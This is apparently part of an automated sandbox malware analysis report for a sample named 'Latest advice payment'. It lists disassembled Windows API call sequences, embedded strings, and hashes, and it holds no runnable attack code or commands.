                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: f5a0f41a99a92334f01324b9faa75436abf1f2779c46d76702f6482a813d4682
                                                            • Instruction ID: a58cdf4fe31bc521c8f09d256945e67135c6ad8fc24a8b8af3cc6744fd836d73
                                                            • Instruction Fuzzy Hash: 0D61FD71900259BAEB18DF65CC85BBB7FACFB08712F104115FE51EA1C1DB74AA80DBA0
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 005CDCDC
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 005CDCEC
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005CDCF8
                                                            • __wsplitpath.LIBCMT ref: 005CDD56
                                                            • _wcscat.LIBCMT ref: 005CDD6E
                                                            • _wcscat.LIBCMT ref: 005CDD80
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005CDD95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDA9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDDB
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDDFC
                                                            • _wcscpy.LIBCMT ref: 005CDE08
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005CDE47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 3566783562-438819550
                                                            • Opcode ID: b609284cd5109a179184ada199ea795935298917e082c1f0db5f1f3d39cc883c
                                                            • Instruction ID: 3952f049cedc7edfd8d275225735f96aeee04320d579839b6484f32fa5807105
                                                            • Instruction Fuzzy Hash: 14613A765042469FCB10EF60C849EAABBE8FF89314F04492DF989D7251DB31E945CBA2
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 005CA3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 005CA418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005CA4C5
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 88996b62895472d5e3fc06fe30f75639a6ed2e851fdb046bbe3edd90bea5bd5c
                                                            • Instruction ID: 1cc82b2d9bf75465b4b8c59e7e37c84ecadfae0b503f1535d28fc669cfedc151
                                                            • Instruction Fuzzy Hash: C2517E7510430A9FC704EF20C885D6ABBE9FF98718F04896DF896572A1DB31ED09CB82
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0059E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 005BF8DF
                                                            • LoadStringW.USER32(00000000,?,0059E029,00000001), ref: 005BF8E8
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0059E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 005BF90A
                                                            • LoadStringW.USER32(00000000,?,0059E029,00000001), ref: 005BF90D
                                                            • __swprintf.LIBCMT ref: 005BF95D
                                                            • __swprintf.LIBCMT ref: 005BF96E
                                                            • _wprintf.LIBCMT ref: 005BFA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005BFA2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: 4fb1e6399800544153f021440ec97864a974dc128d6d307de394f8e1ecb77eaf
                                                            • Instruction ID: 7b4a79878eb9961269a251a413c15c6852c7131bd87882648df433bba0f20eaf
                                                            • Instruction Fuzzy Hash: 80412C7280450EAACB15FBE0DD8ADEEBB79BF98304F500465B505B70A1EE316F49CB61
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,005E9207,?,?), ref: 005EBA56
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA78
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 005EBA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005EBAA6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005E9207,?,?,00000000,?), ref: 005EBABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,005F2CAC,?), ref: 005EBAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 005EBAE7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 005EBB0B
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 005EBB36
                                                            • DeleteObject.GDI32(00000000), ref: 005EBB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005EBB74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: b1ab1fc20d0ed900053d3e04a02237545e97994589514dfbcea3fbfbf2c9beac
                                                            • Instruction ID: e0cb31f75e89417ca5ff68bfa85e752d04a03f49034988bbc6b3539ffe7b2915
                                                            • Opcode Fuzzy Hash: b1ab1fc20d0ed900053d3e04a02237545e97994589514dfbcea3fbfbf2c9beac
                                                            • Instruction Fuzzy Hash: 67414B75500248FFDB199F65DC88EAB7BB8FB99712F104068F985DB260DB309E05DB60
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 005CDA10
                                                            • _wcscat.LIBCMT ref: 005CDA28
                                                            • _wcscat.LIBCMT ref: 005CDA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005CDA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 005CDA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 005CDA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CDAA7
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: e71d1332f65356fd4ed66cfef8d2dffd10ec20041653a8e40114ada1b98f0786
                                                            • Instruction ID: 4839b870132e7732731fa414dd4a801e527ddb4522de2f29143c0f332a567bd9
                                                            • Opcode Fuzzy Hash: e71d1332f65356fd4ed66cfef8d2dffd10ec20041653a8e40114ada1b98f0786
                                                            • Instruction Fuzzy Hash: 588171755042419FCB24EFA4C885E6ABBF8BF89314F144C3EF889DB251EA30D945CB62
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005EC1FC
                                                            • GetFocus.USER32 ref: 005EC20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 005EC217
                                                            • _memset.LIBCMT ref: 005EC342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005EC36D
                                                            • GetMenuItemCount.USER32(?), ref: 005EC38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 005EC3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005EC3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005EC41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005EC454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 005EC489
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: d14f2169e33a8f2b4637cbbbe662f932a4093b7fdb1d6d09fed59417bab99578
                                                            • Instruction ID: 5d665603fce86b8681531dbb919c6530d37ee7658b894d9c529419900be346d1
                                                            • Opcode Fuzzy Hash: d14f2169e33a8f2b4637cbbbe662f932a4093b7fdb1d6d09fed59417bab99578
                                                            • Instruction Fuzzy Hash: 65816B712083919FDB28DF15C894A6BBFE9FB88714F00492EF9D597291C770D906CB52
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 005D738F
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 005D739B
                                                            • CreateCompatibleDC.GDI32(?), ref: 005D73A7
                                                            • SelectObject.GDI32(00000000,?), ref: 005D73B4
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 005D7408
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 005D7444
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 005D7468
                                                            • SelectObject.GDI32(00000006,?), ref: 005D7470
                                                            • DeleteObject.GDI32(?), ref: 005D7479
                                                            • DeleteDC.GDI32(00000006), ref: 005D7480
                                                            • ReleaseDC.USER32(00000000,?), ref: 005D748B
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 9709492f051e64cbcfabc0ef03ba360c11befcb001dc99079dbf19905b7d0153
                                                            • Instruction ID: cd90571a37b6178aa0d801007c4d114d2d468f29cdb6d5da6912aaae87c0f89e
                                                            • Opcode Fuzzy Hash: 9709492f051e64cbcfabc0ef03ba360c11befcb001dc99079dbf19905b7d0153
                                                            • Instruction Fuzzy Hash: 9A513C71904249EFCB25CFA8CC88EAEBBB9FF48310F14841EF99A97310D731A9449B50
                                                            APIs
                                                              • Part of subcall function 00580957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00566B0C,?,00008000), ref: 00580973
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00566BAD
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00566CFA
                                                              • Part of subcall function 0056586D: _wcscpy.LIBCMT ref: 005658A5
                                                              • Part of subcall function 0058363D: _iswctype.LIBCMT ref: 00583645
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 74d8f1edd6e84eab31ebcd5e1b0d24573311d57d4a87db9e6c759824c86431fc
                                                            • Instruction ID: 94a1bb53421bbe8ef3fa33bcf3921927c5d34c479f47e80028042a26bd76257d
                                                            • Opcode Fuzzy Hash: 74d8f1edd6e84eab31ebcd5e1b0d24573311d57d4a87db9e6c759824c86431fc
                                                            • Instruction Fuzzy Hash: AE0247311083429FCB24EF24C895AAFBFE5BFD9314F14491DF49A972A1DB309949CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2D50
                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 005C2DDD
                                                            • GetMenuItemCount.USER32(00625890), ref: 005C2E66
                                                            • DeleteMenu.USER32(00625890,00000005,00000000,000000F5,?,?), ref: 005C2EF6
                                                            • DeleteMenu.USER32(00625890,00000004,00000000), ref: 005C2EFE
                                                            • DeleteMenu.USER32(00625890,00000006,00000000), ref: 005C2F06
                                                            • DeleteMenu.USER32(00625890,00000003,00000000), ref: 005C2F0E
                                                            • GetMenuItemCount.USER32(00625890), ref: 005C2F16
                                                            • SetMenuItemInfoW.USER32(00625890,00000004,00000000,00000030), ref: 005C2F4C
                                                            • GetCursorPos.USER32(?), ref: 005C2F56
                                                            • SetForegroundWindow.USER32(00000000), ref: 005C2F5F
                                                            • TrackPopupMenuEx.USER32(00625890,00000000,?,00000000,00000000,00000000), ref: 005C2F72
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005C2F7E
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 3993528054-0
                                                            • Opcode ID: 26d582342d3e51ad94d2009ecca451c74e99883e8fd14632d557af8958e50497
                                                            • Instruction ID: 30cc72514e3cc54264911d8ce445fcae3de30e26722b777805fd470ed95fe3fa
                                                            • Opcode Fuzzy Hash: 26d582342d3e51ad94d2009ecca451c74e99883e8fd14632d557af8958e50497
                                                            • Instruction Fuzzy Hash: 3B71F57060020ABFEB259F95DC89FAABF68FF54364F14021EF615AA1E1CBB15C10DB91
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005D88D7
                                                            • CoInitialize.OLE32(00000000), ref: 005D8904
                                                            • CoUninitialize.OLE32 ref: 005D890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 005D8A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 005D8B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005F2C0C), ref: 005D8B6F
                                                            • CoGetObject.OLE32(?,00000000,005F2C0C,?), ref: 005D8B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 005D8BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005D8C25
                                                            • VariantClear.OLEAUT32(?), ref: 005D8C35
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,_
                                                            • API String ID: 2395222682-217268573
                                                            • Opcode ID: 1366300051f52122f0a7a0861a899c2eedcefe2eab2a15f0889c31cfec4454d1
                                                            • Instruction ID: 68c49d648de52a4de979fc914c43d795ef60f317fd4d0972ed410f85cd88094c
                                                            • Opcode Fuzzy Hash: 1366300051f52122f0a7a0861a899c2eedcefe2eab2a15f0889c31cfec4454d1
                                                            • Instruction Fuzzy Hash: 1DC125B1208305AFD710DF68C88492ABBE9FF89348F00491EF5899B361DB71ED05CB52
                                                            APIs
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _memset.LIBCMT ref: 005B786B
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005B78A0
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005B78BC
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005B78D8
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005B7902
                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005B792A
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005B7935
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005B793A
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 1411258926-22481851
                                                            • Opcode ID: 2f5cf2cbc2ba402cfa2a5aab85fcb0ffe0cbb3d3e449967e9be3d7dd240f0a38
                                                            • Instruction ID: 27ab7a2b64bc3d7c2fa6ca5ea758061029fe216dbc67822e4d69bd2a8b3a149f
                                                            • Opcode Fuzzy Hash: 2f5cf2cbc2ba402cfa2a5aab85fcb0ffe0cbb3d3e449967e9be3d7dd240f0a38
                                                            • Instruction Fuzzy Hash: CE411872C1462DAADF15EBA4DC89DEDBB78FF58714F044129F805A71A1EB306E04CB90
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 1fc0aca4e9af2a9390dcbb49c436a6a73ec4b7bef662c67c08c5845bcf609f36
                                                            • Instruction ID: c465d76b291e66053084b87431a8099b1269ac7b487a3ab261ef509a085c5cad
                                                            • Opcode Fuzzy Hash: 1fc0aca4e9af2a9390dcbb49c436a6a73ec4b7bef662c67c08c5845bcf609f36
                                                            • Instruction Fuzzy Hash: 6741613510028A8BCF18EF11D86AAEE3F65BF55304F545454FCE52B2D1DB709DAACBA0
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0059E2A0,00000010,?,Bad directive syntax error,005EF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 005BF7C2
                                                            • LoadStringW.USER32(00000000,?,0059E2A0,00000010), ref: 005BF7C9
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • _wprintf.LIBCMT ref: 005BF7FC
                                                            • __swprintf.LIBCMT ref: 005BF81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005BF88D
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: af72362e0a914ad204543c921dee0c814a325688caa60b98a913eca9b3a26749
                                                            • Instruction ID: 14df7629776f7d8fa1a1738b7d6b1fe845c447274728d81f937de45c5c6cfcc2
                                                            • Opcode Fuzzy Hash: af72362e0a914ad204543c921dee0c814a325688caa60b98a913eca9b3a26749
                                                            • Instruction Fuzzy Hash: 56214F3295021EFFCF16EF90CC4AEED7B39BF18304F044865B915660A1EA71AA58DB50
APIs
  • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
  • Part of subcall function 00567924: _memmove.LIBCMT ref: 005679AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005C5330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005C5346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005C5357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005C5369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005C537A
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: c350847f477ab296336fa54f98c1d3b83a8800e5a9a92a722aeb6d5e3bb103e5
• Instruction ID: 72d293d872d0fb6d0de79bd1082a1b158450e9c3ff65efba0226eb1a59bf66af
• Opcode Fuzzy Hash: c350847f477ab296336fa54f98c1d3b83a8800e5a9a92a722aeb6d5e3bb103e5
• Instruction Fuzzy Hash: 0711632195015E7DD720BAB1CC49DFF7EBDFBE5B84F1508197411930D1EEA01D84C5A0
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 76acc4cad634f9c948f8036208b6fac787ed1143fc5bd5bcaa8971ec152c766a
• Instruction ID: f1206715c84e8c640bc618dd63d2e9e417bb3ad688b06eef5788f41e97ba373f
• Opcode Fuzzy Hash: 76acc4cad634f9c948f8036208b6fac787ed1143fc5bd5bcaa8971ec152c766a
• Instruction Fuzzy Hash: 9D11C6315041156FDB14AB709C8AEDA7FBCFB51711F0405B9F845E6091EF709A869B50
APIs
• timeGetTime.WINMM ref: 005C4F7A
  • Part of subcall function 0058049F: timeGetTime.WINMM(?,7694B400,00570E7B), ref: 005804A3
• Sleep.KERNEL32(0000000A), ref: 005C4FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 005C4FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005C4FEC
• SetActiveWindow.USER32 ref: 005C500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005C5019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 005C5038
• Sleep.KERNEL32(000000FA), ref: 005C5043
• IsWindow.USER32 ref: 005C504F
• EndDialog.USER32(00000000), ref: 005C5060
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: b344bde32fc7535e43fe689ac45bf13b48982661e0d8626573fddc6b444a9163
• Instruction ID: 61e6d38f94bf41916d82e05835be553bc8f67768d28cf10580075570551eb0ce
• Opcode Fuzzy Hash: b344bde32fc7535e43fe689ac45bf13b48982661e0d8626573fddc6b444a9163
• Instruction Fuzzy Hash: 6D219270200A45AFE7245FA0ECC8F263F6AFB65745B04202CF542A52B1DF715E49AB61
APIs
  • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
  • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
• CoInitialize.OLE32(00000000), ref: 005CD5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005CD67D
• SHGetDesktopFolder.SHELL32(?), ref: 005CD691
• CoCreateInstance.OLE32(005F2D7C,00000000,00000001,00618C1C,?), ref: 005CD6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005CD74C
• CoTaskMemFree.OLE32(?,?), ref: 005CD7A4
• _memset.LIBCMT ref: 005CD7E1
• SHBrowseForFolderW.SHELL32(?), ref: 005CD81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005CD840
• CoTaskMemFree.OLE32(00000000), ref: 005CD847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005CD87E
• CoUninitialize.OLE32(00000001,00000000), ref: 005CD880
Memory Dump Source
• Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
